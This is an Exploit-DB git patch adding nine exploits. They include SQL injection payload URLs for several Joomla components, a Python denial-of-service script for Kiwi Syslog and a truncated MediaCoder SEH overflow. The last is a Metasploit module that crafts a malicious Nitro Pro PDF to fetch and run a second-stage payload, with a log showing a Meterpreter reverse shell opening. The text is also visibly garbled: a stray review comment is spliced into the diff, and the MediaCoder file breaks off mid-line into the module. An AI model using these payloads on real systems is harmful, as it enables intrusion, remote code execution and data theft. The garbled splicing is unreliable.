From a600aa05cde29e7a6fa137efebf63eee26013045 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 3 Aug 2017 05:01:30 +0000
Subject: [PATCH] DB: 2017-08-03
9 new exploits
Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service
MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)
Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)
Entrepreneur B2B Script - 'pid' Parameter SQL Injection
Joomla! Component SIMGenealogy 2.1.5 - SQL Injection
Joomla! Component PHP-Bridge 1.2.3 - SQL Injection
Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection
Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection
Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection
---
 files.csv | 9 ++
 platforms/php/webapps/42412.txt | 11 ++
 platforms/php/webapps/42413.txt | 15 +++
 platforms/php/webapps/42414.txt | 16 +++
 platforms/php/webapps/42415.txt | 15 +++
 platforms/php/webapps/42416.txt | 16 +++
 platforms/php/webapps/42417.txt | 18 +++
 platforms/windows/dos/42411.py | 55 ++++++++
 platforms/windows/local/41971.py | 45 +++++++
 platforms/windows/local/42418.rb | 219 +++++++++++++++++++++++++++++++
 10 files changed, 419 insertions(+)
 create mode 100755 platforms/php/webapps/42412.txt
 create mode 100755 platforms/php/webapps/42413.txt
 create mode 100755 platforms/php/webapps/42414.txt
 create mode 100755 platforms/php/webapps/42415.txt
 create mode 100755 platforms/php/webapps/42416.txt
 create mode 100755 platforms/php/webapps/42417.txt
 create mode 100755 platforms/windows/dos/42411.py
 create mode 100755 platforms/windows/local/41971.py
 create mode 100755 platforms/windows/local/42418.rb
diff --git a/files.csv b/files.csv
index 181a9e826..a94d88ef4 100644
--- a/files.csv
+++ b/files.csv
@@ -5635,6 +5635,7 @@ id,file,description,date,author,platform,type,port
 42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
 42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
+42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9124,6 +9125,7 @@ id,file,description,date,author,platform,type,port
 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
+41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
 41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
@@ -9166,6 +9168,7 @@ id,file,description,date,author,platform,type,port
 42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
+42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38210,3 +38213,9 @@ id,file,description,date,author,platform,type,port
 42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
+42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
+42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42412.txt b/platforms/php/webapps/42412.txt
new file mode 100755
index 000000000..b19558aec
--- /dev/null
+++ b/platforms/php/webapps/42412.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Entrepreneur B2B Script - 'pid' Parameter SQL Injection
+# Date: 2017-08-02
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://readymadeb2bscript.com/
+# Version: All Version
+
+
+Exploit :
+http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command]
+
+
diff --git a/platforms/php/webapps/42413.txt b/platforms/php/webapps/42413.txt
new file mode 100755
index 000000000..ca27f7c39
--- /dev/null
+++ b/platforms/php/webapps/42413.txt
@@ -0,0 +1,15 @@
+# # # # #
+# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : https://www.simbunch.com/
+# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
+# Demo: https://www.simbunch.com/demos/simgenealogy
+# Version: 2.1.5
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42414.txt b/platforms/php/webapps/42414.txt
new file mode 100755
index 000000000..4c935c878
--- /dev/null
+++ b/platforms/php/webapps/42414.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://www.henryschorradt.de/
+# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
+# Demo: http://www.henryschorradt.de/joomla-php-bridge/
+# Version: 1.2.3
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
+# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42415.txt b/platforms/php/webapps/42415.txt
new file mode 100755
index 000000000..8b910a6d2
--- /dev/null
+++ b/platforms/php/webapps/42415.txt
@@ -0,0 +1,15 @@
+# # # # #
+# Exploit Title: Joomla! Component LMS King Professional v3.2.4.0 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://king-products.net/
+# Software: https://extensions.joomla.org/extensions/extension/living/education-a-culture/lms-king-professional-for-joomla/
+# Demo: http://demo.king-products.net/
+# Version: 3.2.4.0
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42416.txt b/platforms/php/webapps/42416.txt
new file mode 100755
index 000000000..c3632a81f
--- /dev/null
+++ b/platforms/php/webapps/42416.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://joomlashowroom.com/
+# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
+# Demo: http://demo3.joomlashowroom.com/
+# Version: 4.1.3
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
+# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42417.txt b/platforms/php/webapps/42417.txt
new file mode 100755
index 000000000..f6d115951
--- /dev/null
+++ b/platforms/php/webapps/42417.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Ultimate Property Listing v1.0.2 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://faboba.com/
+# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/ultimate-property-listing/
+# Demo: http://demoupl.faboba.com/
+# Version: 1.0.2
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=[SQL]
+# -109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelocation1_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelisting=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/dos/42411.py b/platforms/windows/dos/42411.py
new file mode 100755
index 000000000..8b9fe2665
--- /dev/null
+++ b/platforms/windows/dos/42411.py
@@ -0,0 +1,55 @@
+# Exploit Title: Solarwinds Kiwi Syslog 9.6.1.6 - Remote Denial of Service (Type Mismatch)
+# Date: 26/05/2017
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: https://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.solarwinds.com/
+# Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
+# Version: 9.6.1.6
+# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
+# Category: DoS
+
+"""
+Disclosure Timeline:
+--------------------
+2017-05-20: Vulnerability discovered
+2017-05-26: Vendor contacted
+2017-05-31: Vendor answered (technical support)
+2017-05-31: Vendor contacted (no answer)
+2017-08-01: Exploit published
+
+
+Description :
+-------------
+A remote Denial of Service exists in Kiwi Syslog 9.6.1.6 in the TCP listener.
+Apparently any data sent to it make it crash because of a Type Mismatch error.
+The syslog TCP listener is disabled by default.
+
+
+Instructions:
+-------------
+- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
+- Run this exploit locally or from your remote attacking machine.
+"""
+
+#!/usr/bin/python
+import socket
+
+host = "10.0.0.56"
+port = 1468
+
+buffer = "crash please?"
+
+try:
+ print "[*] Connecting to %s:%d" % (host, port)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+
+ print "[*] Sending buffer... (%d bytes)" % len(buffer)
+ s.send(buffer)
+ s.close()
+
+ print "[*] Done."
+except:
+ print "[-] Error connecting"
diff --git a/platforms/windows/local/41971.py b/platforms/windows/local/41971.py
new file mode 100755
index 000000000..da2b32fe0
--- /dev/null
+++ b/platforms/windows/local/41971.py
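Review bot: The `#!/usr/bin/python` line in the new 42411.py sits after the module docstring (line 36 of the file), so it is not a shebang and the file will not run directly despite its 100755 mode; move it to line 1 or drop it. The bare `except:` at the end also swallows every exception, including `KeyboardInterrupt`, and reports any failure as "Error connecting" even when the connect succeeded and `send` failed; `except socket.error as e:` with the error printed would make a failed run diagnosable. Finally, `s.close()` runs only on the success path, so a `finally:` block would release the socket on every path.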
@@ -0,0 +1,45 @@
+#!/usr/bin/python
+# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
+# Date : 2017-05-08
+# Exploit Author : Muhann4d
+# Vendor Homepage : http://www.mediacoderhq.com
+# Software Link : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
+# Tested Version : 0.8.48.5888
+# Category : Local Buffer Overflow
+# Tested on OS : Windows 7 Professional SP1 32bit
+
+
+print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d"
+from struct import pack
+
+junk = "http://" + "\x41" * 361
+nseh = pack(' 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
+ 'Description' => %q{
+ This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
+ PDF Reader version 11. The saveAs() Javascript API function allows for writing
+ arbitrary files to the file system. Additionally, the launchURL() function allows
+ an attacker to execute local files on the file system and bypass the security dialog
+
+ Note: This is 100% reliable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'mr_me ', # vulnerability discovery and exploit
+ 'Brendan Coles ', # hidden hta tricks!
+ 'sinn3r' # help with msf foo!
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2017-7442' ],
+ [ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
+ [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
+ ],
+ 'DefaultOptions' =>
+ {
+ 'DisablePayloadHandler' => false
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # truly universal
+ [ 'Automatic', { } ],
+ ],
+ 'DisclosureDate' => 'Jul 24 2017',
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
+ OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
+ ])
+ deregister_options('SSL', 'SSLVersion', 'SSLCert')
+ end
+
+ def build_vbs(url, stager_name)
+ name_xmlhttp = rand_text_alpha(2)
+ name_adodb = rand_text_alpha(2)
+ vbs = %Q|
+
+
+
+ |
+ vbs.gsub!(/ /,'')
+ return vbs
+ end
+
+ def on_request_uri(cli, request)
+ if request.uri =~ /\.exe/
+ print_status("Sending second stage payload")
+ return if ((p=regenerate_payload(cli)) == nil)
+ data = generate_payload_exe( {:code=>p.encoded} )
+ send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
+ return
+ end
+ end
+
+ def exploit
+ # In order to save binary data to the file system the payload is written to a .vbs
+ # file and execute it from there.
+ @payload_name = rand_text_alpha(4)
+ @temp_folder = "/Windows/Temp"
+ register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
+ if datastore['SRVHOST'] == '0.0.0.0'
+ lhost = Rex::Socket.source_address('50.50.50.50')
+ else
+ lhost = datastore['SRVHOST']
+ end
+ payload_src = lhost
+ payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
+ stager_name = rand_text_alpha(6) + ".vbs"
+ pdf = %Q|%PDF-1.7
+ 4 0 obj
+ <<
+ /Length 0
+ >>
+ stream
+ |
+ pdf << build_vbs(payload_src, stager_name)
+ pdf << %Q|
+ endstream endobj
+ 5 0 obj
+ <<
+ /Type /Page
+ /Parent 2 0 R
+ /Contents 4 0 R
+ >>
+ endobj
+ 1 0 obj
+ <<
+ /Type /Catalog
+ /Pages 2 0 R
+ /OpenAction [ 5 0 R /Fit ]
+ /Names <<
+ /JavaScript <<
+ /Names [ (EmbeddedJS)
+ <<
+ /S /JavaScript
+ /JS (
+ this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
+ app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
+ )
+ >>
+ ]
+ >>
+ >>
+ >>
+ endobj
+ 2 0 obj
+ <>
+ endobj
+ 3 0 obj
+ <<>>
+ endobj
+ xref
+ 0 6
+ 0000000000 65535 f
+ 0000000166 00000 n
+ 0000000244 00000 n
+ 0000000305 00000 n
+ 0000000009 00000 n
+ 0000000058 00000 n
+ trailer <<
+ /Size 6
+ /Root 1 0 R
+ >>
+ startxref
+ 327
+ %%EOF|
+ pdf.gsub!(/ /,'')
+ file_create(pdf)
+ super
+ end
+end
+
+=begin
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
+[*] Processing scripts/nitro.rc for ERB directives.
+resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
+resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (scripts/nitro.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/nitro.rc)> exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.175.1:4444
+msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.100.4:8080/
+[*] Server started.
+[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
+[*] Sending stage (957487 bytes) to 172.16.175.232
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
+[+] Deleted C:/Windows/Temp/UOIr.hta
+
+msf exploit(nitro_reader_jsapi) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 2412 created.
+Channel 2 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+C:\Users\researcher\Desktop>
+=end
\ No newline at end of file